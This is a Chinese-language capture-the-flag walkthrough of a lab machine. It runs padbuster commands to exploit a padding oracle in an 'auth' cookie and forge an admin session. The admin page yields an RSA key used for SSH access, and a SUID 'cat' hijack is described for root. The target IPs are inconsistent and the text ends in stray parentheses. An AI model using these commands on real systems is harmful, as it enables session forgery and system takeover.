1 信息收集
1.端口掃描
發現 SSH(22)、HTTP(80)端口
nmap -sC -sV 10.129.159.51
2.訪問 80 端口
??1.頁面中存在注冊功能,測試注冊功能
??頁面返回登錄頁面及用戶名
??使用burpsuite觀察注冊請求 /register.php
??2.cookie 測試
??登錄請求 /index.php,觀察cookie,auth不是標準的 PHP 會話管理 cookie,測試auth
??測試auth,在更改auth的值后,響應顯示 Invalid padding,根據響應,猜測可能存在 padding 漏洞
2 padding 攻擊
1.padding oracle攻擊技術
??padding oracle攻擊技術 是指使用密文的填充驗證信息來進行解密的攻擊方法。密碼學中,可變長度的明文信息通常需要經填充后才能兼容基礎的密碼原語。
??攻擊者可以攔截加密算法加密的消息。通過padding oracle攻擊技術,在不清楚 key 和 IV 的前提下解密任意給定的密文。
??使用padbuster工具進行測試:
http://10.129.139.45/index.php
[EncryptedSample] -- Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT一個有效的 cookie
[BlockSize] - 8,一般為 8 或 16。
-cookies auth=Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT -- 向 padbuster 傳遞數據的存放位置
-encoding 0 -- base64
padbuster http://10.129.139.45/index.php Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT 8 -cookies auth=Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT encoding 0
??使用 padbuster工具加密admin
padbuster http://10.129.139.45/index.php Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT 8 -cookies auth=Joak7LI%2Bz9Qvv4hc9LhTYxDOk%2FyzkSyT encoding 0 -plaintext user=admin
獲取權限
??獲取到新的cookie,使用cookie進行登錄,替換cookie,刷新/index.php
BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
??使用admin賬戶登錄成功,頁面URI顯示用戶為 mitsos,及一個RSA私鑰
SSH登錄
chmod 600 id_rsa
ssh -i id_rsa mitsos@10.129.139.45
3 權限提升
??在 mitsos 的主目錄中有一個 根 SUID 二進制文件backup ,以及 cat 命令,運行backup,它輸出的內容類似于 /etc/shadow,該文件只能由 root 讀取
??因為suid程序正在調用cat命令,我們可以編輯cat使用sudo權限打開/bin/sh
)
)
)
)
)
